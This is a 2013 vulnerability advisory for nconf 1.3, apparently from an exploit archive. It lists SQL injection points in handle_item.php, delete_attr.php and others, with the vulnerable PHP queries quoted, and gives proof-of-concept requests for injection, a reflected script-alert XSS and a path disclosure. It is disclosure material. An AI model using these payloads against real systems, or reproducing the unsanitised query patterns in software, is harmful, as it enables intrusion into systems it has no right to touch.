51 lines
1.5 KiB
Text
Executable file
51 lines
1.5 KiB
Text
Executable file
# Exploit Title: nconf handle_item.php?Modify_attr.php etc Multiple Sql injection
|
|
# Date: 2013/3/4
|
|
# Exploit Author: Saadat Ullah?saadi_linux@rocketmail.com
|
|
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
|
|
# Vendors: http://www.nconf.org/
|
|
# Author HomePage: http://security-geeks.blogspot.com/
|
|
# Version: nconf 1.3
|
|
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
|
|
|
|
Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs.
|
|
Some OF them Are
|
|
|
|
Blind Sqli In handle_item.php on Id parameter
|
|
handle_item.php?id=1'
|
|
P0c
|
|
$query2 .= ' AND id_item <> '.$_GET["id"];
|
|
|
|
|
|
delete_attr.php
|
|
POST DATA : id=15'&name=&delete=yes&submit=Delete
|
|
Poc
|
|
Id Via GEt FIELD
|
|
$query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';
|
|
And id via Post Field
|
|
$query = 'DELETE FROM ConfigAttrs
|
|
WHERE id_attr='.$_POST["id"];
|
|
|
|
clone_host_write2db.php
|
|
Again On id paramerter.
|
|
Their are Many more...
|
|
|
|
A Simple Reflected XSS
|
|
http://localhost/nconf/handle_item.php?item=<script>alert('Hi');</script>
|
|
Poc
|
|
$item_class = $_GET["item"];
|
|
.
|
|
.
|
|
echo without Sanitization
|
|
echo '<h2>'.ucfirst($handle_action).' '.$item_class.'</h2>';
|
|
|
|
A LocalPath Disclose
|
|
http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes
|
|
Post Data:
|
|
host_id=5372&highlight_service=5373&class=a
|
|
|
|
|
|
#Independent Pakistani Security Researcher
|
|
|
|
|
|
|
|
|